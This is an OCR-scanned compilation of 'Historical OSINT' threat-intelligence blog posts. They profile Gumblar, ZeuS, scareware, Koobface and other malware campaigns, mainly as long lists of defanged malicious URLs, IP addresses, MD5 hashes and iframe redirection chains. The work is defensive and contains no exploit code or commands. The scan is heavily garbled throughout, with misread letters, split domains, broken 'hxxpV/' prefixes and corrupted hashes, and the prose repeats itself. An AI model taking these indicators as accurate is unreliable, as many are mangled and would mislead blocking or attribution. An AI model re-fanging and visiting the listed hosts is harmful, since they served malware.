hosting provider - HostFresh. 

In this post we'll profile the campaign provide actionable 
intelligence on the infrastructure behind it and dis¬ 
cuss in-depth the tactics techniques and procedures of the 
cybercriminals behind it. We'll also establish a direct 

connection between the campaign's infrastructure and the 

[2]Russian Business Network. 

Maiicious URL: hxxp://58.65.232.33/gpack/index.php 

Reiated maiicious URis known to have participated in 
the campaign - hxxp://58.65.232.25/counter/getexe.php?h- 

= 11 hxxp://58.65.232.25/counter/getfile.php?f=pdf 

We'll continue monitoring the campaign and post updates as 
soon as new developments take place. 

1. httDs://ddanchev.blo as DOt.com/2013/08/dissectin a- 
samole-russia n-business.html 

2. httDs://ddanchev.blo as DOt.com/2017/05/historical-osint- 
inside-2007-2009.html 
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Historicai OSiNT - Gumbiar Botnet infects Thousands 
of Sites Serves Adobe Fiash Expioits (2018-10-19 
22:46) According to [l]security researchers the 
[2]Gumbiar botnet is making a comeback successfully 
affecting thousands of users globally potentially 
compromising the confidentiality availability and integrity of 
the targeted host to a 









multi-tude of malicious client-side exploits serving domains 
further dropping malicious software on the affected hosts. 

In this post we'll provide actionable intelligence on the 
infrastructure behind it and discuss in-depth the tac¬ 
tics techniques and procedures of the cybercriminals behind 
it. 

Malicious URLs known to have participated in the 
campaign: 

hxxp://ncenterpanel.cn/php/unv3.php 

hxxp://ncenterpanel.cn/php/p31.php 

Reiated maiicious MD5s known to have participated 
in the campaign: 

MD5: 3f5b905c86d4dcaab9c86eddffle02c7 
MD5: 61461d9c9cl954193e5e0d4148a81a0c 
MD5:65cdlda3d4cc0616b4a0d4a862a865a6 
MD5: 7de29e5el0adc5d90296785c89aeabce 

Sampie URL redirection chain: 

hxxp://gumblar.cn/rss/?id - 71.6.202.216 - Email: 
cuitiankai(g)googlemail.comi 

hxxp://g umblar.cn/rss/? id=2 

hxxp://g umblar.cn/rss/? id = 3 

Reiated maiicious domains known to have 
participated in the campaign: 



hxxp://martuz.cn - 95.129.145.58 

With Gumblar making a come-back it's becoming evident 
that cybercriminals continuing utilizing the usual set 

of malicious and fraudulent tactics for the purpose of 
spreading malicious software and affecting hundreds of 

thousands of legitimate Web sites in a cost-effective and 
efficient way. 

We'll continue monitoring the campaign and post updates 
and post updates as soon as new developments 

take place. 

1. httDs://en.wikiDedia.or a /wiki/Gumblar 

2. https://www.svmantec.com/connect/blo as/a umblar-botnet- 
ramos-activit v 

97 

Historical OSINT - A Diverse Portfolio of Fake Security 
Software (2018-10-20 20:22) 

In this post I'll profile a currently circulating circa 2008 
malicious and fraudulent sea re ware-serving campaign 
success¬ 
fully enticing users into interacting with rogue and 
fraudulent fake security software with the cybercriminals 
behind 

the campaign successfully earning fraudulent revenue in the 
process of monetizing access to malware-infected hosts 










largely relying on the utilization of an affiliate-network based 
type of revenue-sharing scheme. 

Related malicious domains known to have 
participated in the campaign: 

hxxp://g lobals-advers.com 

hxxp://aI Idiskscheck300.com 

hxxp://mu ltisearchl.com 

hxxp://myfreespace3.com 

hxxp://hottystars.com 

hxxp://mu ltilangl.com 

hxxp://3gigabytes.com 

hxxp://d rivemedirect.com 

hxxp://g lobala2.com/soft.php 

hxxp://teled isons.com 

hxxp://theworld news5.com 

hxxp://vi rtualblog5.com 

hxxp://g rander5.com 

hxxp://5starsblog.com 

hxxp://g lobalreds.com 

hxxp://g lobal-advers.com 

hxxp://ratemy blogl.com 



hxxp://g reatvideo3.com 
hxxp://beg in ner2009.com 
hxxp://fastweb way.com 
hxxp://biazervi ps.com 
hxxp://beg in2009.com 
hxxp://megatradetds0.com 
hxxp://secu redoniinewebspace.com 
hxxp://proweb-i nfo.com 
hxxpV/security-www-ciicks.com 
hxxp://u pdatedownioadiists.com 
hxxpV/styieoniyciicks.cn 
hxxp://i nformationgohere.com 
hxxp://worid-ci ick-service.com 
hxxp://secutitypowerci icks.cn 
hxxp://secu redciickuser.cn 
hxxp://si ickoverview.com 
hxxp://viewyou rciicks.com 
hxxp://ci ickwww2.com 
hxxp://ci ickadsystem.com 
hxxp://becomepoweruser.cn 



hxxp://cl ickoverridesystem.cn 

Related malicious domains known to have 
participated in the campaign: 

hxxp://protecteduser.cn 

hxxp://i nternetprotectedweb.com 
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hxxp://cl icksadssystems.com 

hxxp://whereismyci ick.cn/ 

hxxp://trustou rciicks.cn 

hxxp://goidenstarci ick.cn 

hxxp://defendedsystemuser.cn 

Related malicious domains known to have 
participated in the campaign: 

hxxp://d rivemedirect.com 

hxxp://vi rtuaibiog5.com 

hxxp://fastweb way.com 

We'ii continue monitoring the campaign and post updates 
soon as new deveiopments take piace. 
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Historical OSINT - Calling Zeus Home (2018-10-20 
20:25) 



Remember ZeuS? The infamous crimeware-in-the-middle 
exploitation kit? In this post I'll provide historical OSINT 

on various ZeuS-themed malicious and fraudulent campaigns 
intercepted throughout 2008 and provide actionable 

intelligence on the infrastructure behind the campaign. 

Related malicious domains known to have 
participated in the campaign: 

hxxp ://myxaxa .com/z/cfg .bin 

hxxp ://doky mentu .i nfo/zeus/cfg .bi n 

hxxp ://on I ine-traffeng.com/zeus/cfg. bin 

hxxp://malwaremodel.biz/zeus/cfg.bin 

hxxp ://g iftca rdsbox.com/web/cfg .bi n 

hxxp ://dOrnk.com/cfg. bin 

hxxp://rfs-g roup.net/cool/cfg.bin 

hxxp://62.176.16.19/11/cfg.bin 

hxxp ://81.95.149.74/demo/cfg.bin 

hxxp://66.235.175.5/.cs/cfg.bin 

hxxp ://2 08.72.169.152/web/cfg.bin 

hxxp ://a ntispyware-protection.com/web/cfg.bin 

hxxp://sOsl.net/web/cfg.bin 

hxxp://208.72.169.151/admin/cfg.bin 



hxxp://l ntrO.com/zuzu/cfg. bin 
hxxp://88.255.90.170/bt/fiz/cfg.bin 
hxxp://58.65.235.4/web/conf/cfg.bin 
hxxp://forgoogleonly.cn/open/cfg.bin 
hxxp://194.1.152.172/11/cfg.bin 

We'll continue monitoring the campaign and post updates as 
soon as new developments take place. 
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Historical OSINT - Chinese Government Sites Serving 
Malware (2018-10-20 20:28) 

It's 2008 and I'm stumbling upon yet another decent 
portfolio of compromised malware-serving Chinese 
government 

Web sites. In this post I'll discuss in-depth the campaign and 
provide actionable intelligence on the infrastructure 

behind it. 

Compromised Chinese government Web site: 

hxxp://ny news.gov.cn 

Sample malicious domains known to have 
participated in the campaign: 

hxxp://gamel983.com/i ndex.htm 

hxxp://sp.070808. net/2 3.htm 

hxxp://h igain-hitech.com/mm/index.html 



Currently affected Chinese government Web sites: 

hxxp://www.tgei.gov.cn/dom.txt - iframe - 
hxxp://www.bll0b.com/chbr/110.htm?id=884191 

hxxp://hfinvest.gov.cn/en/aboutus/index.asp - iframe - 
hxxp://n nbzcl2.kki.cn/indax.htm 

hxxp://www.whkx.gov.cn/iii.txt - iframe - 
hxxp://user.free2.77169.net/shmilyzhutou/evil.htm 

hxxp://xc.haqi.gov.cn/jay.htm - iframe - 

hxxp://xc.haqi.gov.cn/jay.htm - hxxp://qqnw.gov.cn/ST.htm 

hxxp://www.whkx.gov.cn/mohajem.txt - iframe - 
hxxp://user.free2.77169.net/shmilyzhutou/evil.htm 

hxxp://www.whkx.gov.cn/iii.txt - iframe - 
hxxp://user.free2.77169.net/shmilyzhutou/evil.htm 

We'll continue monitoring the campaign and post updates as 
soon as new developments take place. 
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Historical OSINT - Hundreds of Bogus Bebo Accounts 
Serving Malware (2018-10-20 20:29) 

It's 2010 and I've recently intercepted a wide-spread Bebo 
malicious malware-serving campaign successfully enticing 

users into interacting with the fraudulent and malicious 
content potentially compromising the confidentiality 

availability and integrity of the targeted host to a multi-tude 
of malicious software. 



Sample malicious domains known to have 
participated in the campaign: 

hxxp://boss.gozbest.net/xd.html - 216.32.83.110 

hxxp://tafficbots.com/in.eg i?6 

hxxp://bolapaqir.com/in.cgi?2 

hxxp://my big-porn.com/promo4/7aid = 1339 

We'll continue monitoring the campaign and post updates as 
soon as new developments take place. 
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Historical OSINT - PhishTube Twitter Broadcast 
Impersonated Scareware Serving Twitter Accounts 
Circu¬ 
lating (2018-10-20 22:10) 

It's 2010 and I've recently intercepted a currently circulating 
malicious and fraudulent malware-serving spam 

campaign successfully enticing hundreds of thousands of 
users globally into interacting with the rogue and malicious 

software found on the compromised hosts in combination 
with a currently active Twitter malware-serving campaign 

successfully enticing users into interacting with the rogue 
and bogus content. 

In this post I'll provide actionable intelligence on the 
infrastructure behind the campaign and provide action¬ 


able intelligence on the infrastructure behind it. 



Sample malicious domains known to have 
participated in the campaign: 

hxxp://PhishTube-Broadcast-811.5a5.us 

hxxp://Sony-195.5us.us 

hxxp://Hummer-631.5a5.us 

hxxp://PS3-502.24dat.com 

hxxp://PS3-843.5us.us 

hxxp://Air-France-133.5a5.us 

hxxp://PS3-519.5a5.us 

hxxp://Sony-918.24dat.us 

hxxp://Natal-29.5a5.us 

Sample malicious domains known to have 
participated in the campaign: 

hxxp://su7.us/tds/go.php?sid = l 

Sample URL redirection chain: 

http://66.199.229.253/etds/go.php?sid=4 -> -> 
http://mybig-porn.com/promol/7aid = 1470 -> 

hxxp://onIine-adult-directory.com/7aid = 10012 -> 
hxxp://you rdatingnetwork.com/7aid = 697 

Sample malware known to have participated in the 
campaign: 

MD5: a4ff9c2b4fd6917dl2e962a7b6173143 
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Historical OSINT - Massive Blackhat SEO Campaign 
Courtesy of the Koobface Gang Spotted in the Wild 

( 2018 - 10-20 22 : 28 ) 

It's 2010 and I've recently stumbled upon yet another 
massive blackhat SEO campaign courtesy of the Koobface 
gang 

successfully exposing hundreds of thousands of users to a 
multi-tude of malicious software. 

In this post I'll provide actionable intelligence on the 
infrastructure behind it and discuss in the depth the tac¬ 
tics techniques and procedures of the cybercriminals behind 
it. 

Sample domains known to have participated in the 
campaign: 

hxxp://j hpegdueeunz.55fast.com 
hxxp://vzhusyeeau bk.55fast.com 
hxxp://cvzizl iiustw.55fast.com 
hxxp://zetaswu iouax.55fast.com 
hxxp://shzopfioarpd.55fast.com 
hxxp://nqpubruioeat.55fast.com 
hxxp://krrepteievdr.55fast.com 
hxxp://gtoancoiuyqv.55fast.com 



hxxp://felopfooaydk.55fast.com 
hxxp://d knejxaeozjb.55fast.com 
hxxp://lj perwaaoxjs.55fast.com 
hxxp://hxmagxaeu I bn.55fast.com 
hxxp://mueombooi kgp.55fast.com 
hxxp://g luezneoolhs.55fast.com 
hxxp://ptpodseeanvk.55fast.com 
hxxp://jgdey raoojdr.55fast.com 
hxxp://kjsetqaoojdr.55fast.com 
hxxp://kvuel veuicmn.55fast.com 
hxxp://y woamnooikfp.55fast.com 
hxxp://d nkopgioawss.55fast.com 
hxxp://qjtepyaoigts.55fast.com 
hxxp://fdsud peeewam.55fast.com 
hxxp://q umobxoiigst.55fast.com 
hxxp://fkvahzaei bbz.55fast.com 
hxxp://ixxi khiuutwm.55fast.com 
hxxp://meboczoi ikgy.55fast.com 
hxxp://mevoxi iiidyq.55fast.com 
hxxp://hxvoysaoozhp. 55fast.com 



hxxp://wiaabcoookfs.55fast.com 

hxxp://wl batgeeiohc.55fast.com 

Sample malicious domains known to have 
participated in the campaign: 

hxxp://narezxaauggf. 55fast.com 

hxxp://gclsetqaoocks.55fast.com 

hxxp://ptxi hhiiihpq.55fast.com 

hxxp://rami ihueamxg.55fast.com 

hxxp://vvnoxi iiigsp.55fast.com 

hxxp://y wweypeaeemz.55fast.com 

hxxp://rqqetweeupwn.55fast.com 

hxxp://fprewmaooj pn.55fast.com 
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hxxp://kbma hjiiigpw.55fast.com 
hxxp://romozj uuurov.55fast.com 
hxxp://tmxufseaacks.5 5fast.com 
hxxp://viaegj iooeun.55fast.com 
hxxp://zn masciiiicbc.55fast.com 
hxxp://gcibiczooaoaw.55fast.com 
hxxp://boqegkooouom.55fast.com 



hxxp://xncoxloi iwrm.55fast.com 

hxxp://flxowreuu hkb.55fast.com 

hxxp://zzki hgiuupwb.55fast.com 

hxxp://gxcobmeeuvis. 55fast.com 

hxxp://wyg imweuizxz.55fast.com 

hxxp://wi nowmeaoxhy.55fast.com 

hxxp://h hpewmaoicitm.55fast.com 

hxxp://nemoxioi ixih.55fast.com 

hxxp://bvbowvooigtq. 55fast.com 

hxxp://pg massuiixvx.55fast.com 

hxxp://vbxoxki iijst.55fast.com 

hxxp://ci nobhaoobzf.55fast.com 

hxxp://proawnaoozxf. 55fast.com 

Sample malicious domains known to have 
participated in the campaign: 

hxxp://romwrpueerr.007gb.com 

hxxp://rtperweaauux. 5 nxs.com 

hxxpV/prougpeeabzd. hostevo.com 

hxxp://stwermoi igwc.10fast.net 

hxxp://zn masciiiicbc.55fast.com 



hxxp://gjxotyuuobmv.007sites.com 

Sample malicious domains known to have 
participated in the campaign: 

hxxp://d pfujhiuijhd.hostevo.com 

hxxp://gfh izliiikjd.hostevo.com 

hxxp://d riozkuueqic.hostevo.com 

hxxp://rrki hfuuuspr.hostevo.com 

hxxp://xzki khueeivf.hostevo.com 

hxxp://trqawmaookgp. hostevo.com 

hxxp://hggudseuerqn. hostevo.com 

hxxp ://phveflaeu I mn.hostevo.com 

hxxp://cvxi ljiuuyrm.hostevo.com 

hxxp ://fdseffuueq iv.hostevo.com 

hxxp ://dsteyraaaxgr. hostevo.com 

hxxp ://pfjocbeu iznb.hostevo.com 

hxxp ://cczi ljiuurab.hostevo.com 

Sample malicious domains known to have 
participated in the campaign: 

hxxp://jgfuspeeeauc.hostevo.com 

hxxp ://g rioxhueoxlf.hostevo.com 

hxxp ://d pdilkiiihfy.hostevo.com 



hxxp://mi uonbaoifwv.hostevo.com 
hxxp://f pteymoiuqmj.hostevo.com 
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hxxp://ciyoovzi uebvj.hostevo.com 
hxxpV/rpdojzaaesgg.hostevo.com 
hxxpV/zzku hguuewib.hostevo.com 
hxxp://bqyu nruiaecw.hostevo.com 
hxxp://sruoij iuurqb.hostevo.com 
hxxpV/stratreaaebk. hostevo.com 
hxxp://kjsetwaookcit. hostevo.com 
hxxp://prougpeeabzci. hostevo.com 
hxxpV/nrfitdioaoyd. hostevo.com 
hxxp://cxi igdueewoc.hostevo.com 
hxxp://tqaa wmaoamvj.hostevo.com 
hxxp://q unoxiiiifyw.hostevo.com 
hxxp://zkfusteaanch.hostevo.com 
hxxp://q umobcooozjf.hostevo.com 
hxxp://sqqawmaaamvj.hostevo.com 
hxxp://kiguy raoojdr.hostevo.com 
hxxp://fspespueeiez. hostevo.com 



hxxp://sjcadjoaepfh.55fast.com 

Sample malicious domains known to have 
participated in the campaign: 

hxxp://sjcadjoaepfh.55fast.com 

hxxp://pkbadlaeujcv.55fast.com 

hxxp://vnvoczi iifst.55fast.com 

hxxp://wauan booikfy.55fast.com 

hxxp://yovi kdeaanch.55fast.com 

hxxp://j vuelvaeukcc.55fast.com 

hxxp://l kgufpeeaunz.55fast.com 

hxxp://kjfufseeei ml.55fast.com 

hxxp://bmmoxl iiifdt.55fast.com 

hxxp://nqtuxneu ixbb.55fast.com 

hxxp://wioabnaoi kfp.55fast.com 

hxxp://ssdi kzaaaiiq.55fast.com 

hxxp://rwaammaaeowm.55fast.com 

hxxp://lj ifsueaumz.55fast.com 

Sample malicious domains known to have 
participated in the campaign: 

hxxp://l ljifsueaumz.55fast.com 

hxxp://n bzigpeaoksq.55fast.com 



hxxp://mvj ufraoidqb.55fast.com 
hxxp://hgdupraoisqc.55fast.com 
hxxp://khdudseeeauc.55fast.com 
hxxp://fspetwaaabxh. 55fast.com 
hxxp://tqoavxoiidyq.55fast.com 
hxxp://xeau bwuiardg.55fast.com 
hxxp://n bvoncoooihp.55fast.com 
hxxp://wexig paoambi.55fast.com 
hxxpV/ki huggiuufdt.55fast.com 
hxxp://dxwetteoigst. 55fast.com 
hxxp://g ivashoaeygj.55fast.com 
hxxp://xmoejcaeujxc.5 5fast.com 
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Sample malicious domains known to have 
participated in the campaign: 

hxxp://jfsfkfuueqw.007gb.com 

hxxp://bbxci moiify.007gb.com 

hxxp://ijgjxkueewi.007gb.com 

hxxp:///xzkg kguueaa.007gb.com 

hxxp://wmhj vkuaabj.007gb.com 



hxxp://yqbzmciuu pt.007gb.com 

hxxp://l vxvieaoizj.007gb.com 

hxxp://srnvuioooi<f.007gb.com 

hxxp://mei hi hueeqe.007gb.com 

hxxpV/ikhjci ueuwa.007gb.com 

Sample malicious domains known to have 
participated in the campaign: 

hxxpV/ikhjci ueuwa.007gb.com 

hxxp://bvgsfyaooxh.007gb.com 

hxxp://xbkhceeu ifci.007gb.com 

hxxp://y wncmvoiojf.007gb.com 

hxxp://kj ptpwaaaci.007gb.com 

hxxp://g pmcumooavx.007gb.com 

hxxp://ci pwnaioookf.007gb.com 

hxxp://stq naiaoihci.007gb.com 

hxxp://fspygfuuerq.007gb.com 

hxxp://wbgtsyeaamb.007gb.com 

hxxp://fprmwoaaavi.007gb.com 

hxxp://mmxi nvoiijci.007gb.com 

hxxp://vvi in moooci.007gb.com 



Sample malicious domains known to have 
participated in the campaign: 

hxxp://vvl I nmooocl.007gb.com 

hxxp://zlgsgpeaabz.007gb.com 

hxxp://ccjfxleeewq.007gb.com 

hxxp://cvhfjguueqi.007gb.com 

hxxp://l hprsraaack.007gb.com 

hxxp://razzbci iupt.007gb.com 



hxxp://rancoeooozh.007gb.com 

hxxp://muczi moooxh.007gb.com 

hxxp://tphotd ioetdf.hostevo.com 

hxxp://vvxifpeaoc ks.hostevo.com 

hxxp://jj hi I looolhf.hostevo.com 

hxxp://bzxixl iiudpr.hostevo.com 

hxxp://xmvovxooozhp. hostevo.com 

hxxp://prooczi uuprm.hostevo.com 

hxxp://qebovzi uuswb.hostevo.com 

hxxp://xzh usteaabzs.hostevo.com 

hxxp://bbbovxiu ifyq.hostevo.com 

Sample malicious domains known to have 
participated in the campaign: 

hxxp://d pretqaoocjy.hostevo.com 

hxxp://ywaaqbaoozjs.5nxs.com 
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hxxp://fsyepteaaen 1.5 nxs.com 
hxxp://j hgufpeeeaic.5nxs.com 
hxxp://dsterqaaoczg.5nxs.com 
hxxp://rivi I hueeiuc.5nxs.com 



hxxp://znouxneuaayd.5 nxs.com 

hxxp://kkg ijguueonh.5nxs.com 

hxxp://khsamvooi hdt.5nxs.com 

hxxp://n ncikgueaflg.5nxs.com 

hxxp://fd pixnaaaoiv.5nxs.com 

hxxp://zzzi khiiihfy.5nxs.com 

hxxp://sqaayteaai mz.5nxs.com 

Sample malicious domains known to have 
participated in the campaign: 

hxxp://tq uambooilhs.5nxs.com 

hxxp://gdtaq boiojdt.5nxs.com 

hxxp://queoxl iuudtq.5nxs.com 

hxxp://vbcokloi ikhs.5nxs.com 

hxxp://raoad pi uigst.5nxs.com 

hxxp://qevijfu eeibj.5nxs.com 

hxxp://kj I icvoooncj.5nxs.com 

hxxp://sroavlueeixd. 5 nxs.com 

hxxp://xxl ijkiuuyqm.5nxs.com 

hxxp://vvcij reaaenl.5nxs.com 

hxxp ://zzkigdueu rab.5nxs.com 



hxxp://zxkigd ueeoel.5nxs.com 

hxxp://tqoanvooijfy. 5 nxs.com 

Sample malicious domains known to have 
participated in the campaign: 

hxxp://wnxufpeaaevj.5 nxs.com 

hxxp:///ptaamboi ihsw.5nxs.com 

hxxp://vbxij hueurix.5nxs.com 

hxxp://fpkijxi iidox.5nxs.com 

hxxp ://streqwaooxcg .5 nxs.com 

hxxp://ptyewmaoolgy.5 nxs.com 

hxxp ://hgyeq boiihpw.5nxs.com 

hxxp ://cxj ijgueeaez.5nxs.com 

hxxp ://woeobvoi ihdt.5nxs.com 

hxxp ://bcxixj ueuqmj.5nxs.com 

hxxp ://mmvobxoi ihdr.5nxs.com 

hxxp ://prqawnaoozgy.5 nxs.com 

hxxp ://xzkugsueeu nk.5nxs.com 

hxxp ://vvbovxi iidym.5nxs.com 

hxxp ://q inozkiuidyw.5nxs.com 

hxxp ://tpdu mweuughh.5nxs.com 



Sample malicious domains known to have 
participated in the campaign: 

hxxp://tpd umweuughh.5nxs.com 

hxxp://zkfud peaaech.5nxs.com 

hxxp://vvcijfu eeamk.5nxs.com 

hxxp://j khihdiuuypw.5nxs.com 
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hxxp://womancoi uyav.5nxs.com 

hxxp://sfkoyfooepgh.5nxs.com 

hxxp://zzhetqaooxkd. 5 nxs.com 

hxxp://czjudyeaacjp.5 nxs.com 

hxxp://gssud peaaecg.5nxs.com 

hxxp://wi uobvooozjp.5nxs.com 

hxxp://twaamnaookhd. 5 nxs.com 

hxxp://bbvocloi igsr.5nxs.com 

Sample malicious domains known to have 
participated in the campaign: 

hxxp://dspugd uuuytm.5nxs.com 

hxxp://klj igdueeqic.5nxs.com 

hxxp://g pioxhuuutav.5nxs.com 

hxxp://wouavcooiy il.5nxs.com 



hxxp://mevoxl iuuyrm.5nxs.com 

hxxp://xvcocxoiojfy. 5 nxs.com 

hxxp://zlj udyeaaunl.5nxs.com 

hxxp://woaabcoi usst.5nxs.com 

hxxp://d ppudpeeewmh.5nxs.com 

hxxp://zzh ustueequk.5nxs.com 

hxxp://quboczoiolgd.5nxs.com 

Sample malicious domains known to have 
participated in the campaign: 

hxxp://kdwetmoiu ics.5nxs.com 

hxxp://jgfudseeerqb.5 nxs.com 

hxxp://q unolhueeonx.5nxs.com 

hxxp://khd usyeaaeez.5nxs.com 

hxxp://bvci kg ueequx.5nxs.com 

hxxp://xzj upteaovzg.5nxs.com 

hxxp://rml udpueoebj.5nxs.com 

hxxp://pfyu pteeeauz.5nxs.com 

hxxp://qqreqnoeewhs.5 nxs.com 

hxxp://ysfuyraaaczs. 5 nxs.com 

hxxp ://ljdudyeaamcj. 5 nxs.com 



hxxp://vbvovzi iustm.5nxs.com 

hxxp://gffugdueei bz.5nxs.com 

Sample malicious domains known to have 
participated in the campaign: 

hxxp://bnjdzkiu uyw.007gb.com 

hxxp://d pppdpeeeii.007gb.com 

hxxp://zzfd hdeeeoe.007gb.com 

hxxp://h hhhzciuusa.007gb.com 

hxxp://d pmlbkiuuta.007gb.com 

hxxp://ccgsgpeaaev.007gb.com 

hxxp://vbzxecoiuso.007gb.com 

hxxp://n bkfhdeaack.007gb.com 

hxxp://bmvcaoeeaoe.007gb.com 

hxxp://xchfgg iuewq.007gb.com 

hxxp://jgypgpeaoxh.007gb.com 
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Sample malicious domains known to have 
participated in the campaign: 

hxxp://jgypgpeaoxh.007gb.com 

hxxp://hdstpraoojd.007gb.com 

hxxp://n nkkvziiigh.007gb.com 



hxxp://q wyduquuoeo.007gb.com 

hxxp://j hgdkzooobn.007gb.com 

hxxp://ljyqweoi ihf.007gb.com 

hxxp://xzfdfsueaux.007gb.com 

hxxp://kjfhzj ueeae.007gb.com 

hxxp://tan buoeaanb.007gb.com 

hxxp://rammooaaocx.007gb.com 

hxxp://gsmxml ueoht.007gb.com 

hxxp://xxjg kg uueuu.007gb.com 

hxxp://jg ppfpeeaev.007gb.com 

hxxp://xzfpfpeaozh.007gb.com 

Sample malicious domains known to have 
participated in the campaign: 

hxxp://khsphdueaev.007gb.com 

hxxp://wabn ieoiikg.007gb.com 

hxxp://rojshgeoisw.007gb.com 

hxxp://zl hffgueaec.007gb.com 

hxxp://q uxxmnoiokd.007gb.com 

hxxp://rpsd kzoeeqq.007gb.com 

hxxp://rozfksaoi ht.007gb.com 



hxxp://vvzkcvi iuru.007gb.com 

hxxp://ptgdg hueedq.007gb.com 

hxxp://xvj hcliuufi.007gb.com 

hxxp://y wqntweaeqo.007gb.com 

hxxp://mu bwqaaaoxl.007gb.com 

Sample malicious domains known to have 
participated in the campaign: 

hxxp://quzj lgueeib.007gb.com 

hxxp://fdyttteeaou.007gb.com 

hxxp://xxjggseeeom.007gb.com 

hxxp://robvi moiikg.007gb.com 

hxxp://hgspsyeeanx.007gb.com 

hxxp://n bzkckueein.007gb.com 

hxxp://syfdg moiipy.007gb.com 

hxxp://n mkjzjueequ.007gb.com 

Sample malicious domains known to have 
participated in the campaign: 

hxxp://n mkjzjueequ.007gb.com 

hxxp://ytwqyteaaen.007gb.com 

hxxp://kgdfkh uuuyq.007gb.com 

hxxp://zbcvieaoocc.007gb.com 



hxxp://sywrdpeeeie.007gb.com 
hxxp://prn mwaaaamm.007gb.com 
hxxp://djdd hfuuilc.007gb.com 
hxxp://wi bnuboiusw.007gb.com 
hxxp://mucl mboiigd.007gb.com 
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hxxp://vvl kevoiidy.007gb.com 

hxxp://xh prrteaaun.007gb.com 

hxxp://bncvoeaaauu.007gb.com 

Sample malicious domains known to have 
participated in the campaign: 

hxxp://ravhzl uuewo.007gb.com 

hxxp://gsywptaaabz.007gb.com 

hxxp://xxkzbcoi ijd.007gb.com 

hxxp://mevi rwaaovlf.hostevo.com 

hxxp://roboxloi ihdt.007sites.com 

hxxp://rauon booozkf.007sites.com 

hxxp://y wiatreeewam.007sites.com 

hxxp://nxfetmaoolfr.007sites.com 

hxxp://g kmelbeuoear.007sites.com 



hxxp://mmcigsueeexg.007sites.com 

h XX p ://vxx i I j o i oxxg. 1 Of a st.net 

hxxp://jgsuspeeeaic. 10fast.net 

hxxp://qenocxi iihsr.10fast.net 

hxxp://l klilliiigdt.10fast.net 

hxxp://hgdepreaamzs. 10fast.net 

Sample malicious domains known to have 
participated in the campaign: 

hxxp://gffupteaaebj. 10fast.net 

hxxp:///klj igfuuugfp.10fast.net 

hxxp://raianvoiokgy. 10fast.net 

hxxp://rtqerqeaamcg. 10fast.net 

hxxp://gfdugdeaavls. 10fast.net 

hxxp://ddterboi ugsr.10fast.net 

hxxp://jg pewnoiihpq.10fast.net 

hxxp://kjfpfseeeqo.007gb.com 

hxxp://wu bcmciuuya.007gb.com 

hxxp://quzkxvooift.007gb.coml 

hxxp://n blhlheaaum.007gb.com 

hxxp://cclxnciuupq.007gb.com 



hxxp://n bhkckueeib.007gb.com 

hxxp://hgddxl iuudp.007gb.com 

hxxp://wi nil hueuwiz.10fast.net 

hxxp://queocl iuupqv.10fast.net 

hxxp://gdtaq boiihhs.10fast.net 

hxxp://bbvovbaaancg. 10fast.net 

hxxp://fpramvoi iftm.10fast.net 

hxxp://fj I iljiiizhp.10fast.net 

hxxp://gsped peeeiel.10fast.net 

Sample malicious domains known to have 
participated in the campaign: 

hxxp://fssu kjaoanbx.5nxs.com 

hxxp://ptaawvi uuppw.5nxs.com 

hxxp://l lxozkoiikdq.5nxs.com 

hxxp://kkkijg uuuquz.5nxs.com 

hxxp://womobci iiftn.5nxs.com 
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hxxp://vvci kgueequl.5nxs.com 
hxxp://zzzoxcooozzl.5 nxs.com 
hxxp://wu uocziuupwn.5nxs.com 



hxxp://hfyeq noiiftm.5nxs.com 
hxxp://sttewboookgy. 5 nxs.com 
hxxp://g hhusteaozgt.5nxs.com 
hxxp://fjzoqtu uukiw.5nxs.com 
hxxp://muuaqci ueomz.5nxs.com 
hxxp://fsfugd uuutav.5nxs.com 
hxxp://jgdeywaoocks. 5 nxs.com 
hxxp://ran iljuuurix.5nxs.com 
hxxp://pabi khueamcg.5nxs.com 
hxxp://gsteq booikdr.5nxs.com 
hxxp://l I hugfuuerab.5nxs.com 
hxxp://dspeyyeeeauv.5 nxs.com 
hxxp://xzkixhuaoczg. 5 nxs.com 
hxxp://rouawmaaammz. 5 nxs.com 
hxxp://kxl ijjiuuspt.5nxs.com 
hxxp://xzl iljiuifyw.5nxs.com 
hxxp://vvvil hiueqac.5nxs.com 
hxxp://tovi khiiufdt.5nxs.com 
hxxp://ttretreeu hgs.5nxs.com 



Sample malicious domains known to have 
participated in the campaign: 

hxxp ://ypserreeuytq .5 nxs.com 

hxxp://xxzij kiiikkf.5nxs.com 

hxxp ://bvzoknaoig pm.5nxs.com 

hxxp ://n nxihduuutqv.5nxs.com 

hxxp ://muzidyeeeevh.5 nxs.com 

hxxp ://tpdufh iiidrn.5nxs.com 

hxxp://ffpupteeeaqd.5nxs.com 

hxxp ://bbxigseeol pm. 5 nxs.com 

hxxp://gsdug peaeibj.5nxs.com 

hxxp ://pwteyyeaamcg. 5 nxs.com 

hxxp ://zxcolj iiigpw.5nxs.com 

hxxp ://bmacxoi ixjs.5nxs.com 

hxxp ://twqawmaooczf. 5 nxs.com 

hxxp ://bbra rtuauhjh.5nxs.com 

hxxp ://dtiol hueeexd.5nxs.com 

Sample malicious domains known to have 
participated in the campaign: 

hxxp://gddu hgiiikhd.5nxs.com 

hxxp://ryqu hfuuuypr.5nxs.com 



hxxp://sfh ijkiuusrn.5nxs.com 
hxxp://staen naoolgy.5nxs.com 
hxxp://vvvoczooolzg. 5 nxs.com 
hxxp://bmnokgueeq uz.5nxs.com 
hxxp://proocxoi igds.5nxs.com 
hxxp://ptwepwaoozht. 5 nxs.com 
hxxp://fsdufpeeeovg.5 nxs.com 
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hxxp://dtl id woiuyoz.5nxs.com 

hxxp://kvyamboiu hsr.5nxs.com 

hxxp://kvmard ioetyp.5nxs.com 

hxxp://tan iljueuwul.5nxs.com 

hxxp ://jvnartuu ixvx.5nxs.com 

hxxp://qubijgiuutac.5nxs.com 

Sample malicious domains known to have 
participated in the campaigns: 

hxxp://qebocziu idfy.10fast.net 

hxxp://gffud peeeauc.10fast.net 

hxxp ://vbj ustaiurox.10fast.net 

hxxp://jgyu ptaoutic.10fast.net 



hxxp://l khighueeevk.10fast.net 
hxxp://ptpud reeeobz.10fast.net 
hxxp://meeambaooxls. 10fast.net 
hxxp://yrreyraaovld.10fast.net 
hxxp://kkd utwaoobzd.10fast.net 
hxxp://czxitbou uquz.10fast.net 
hxxp://l vbovnaoozjp.10fast.net 
hxxp://wi iambaookdt.10fast.net 
hxxp://zxkijg ueaecg.10fast.net 
hxxp://y wqawqaoovzh.10fast.net 
hxxp://gzou kwuuizbv.10fast.net 
hxxp://roiabcoi igpq.10fast.net 
hxxp://vvl ufseaavld.10fast.net 
hxxp://hg pusyeaamxg.10fast.net 
hxxp://kkki kziiifyq.10fast.net 
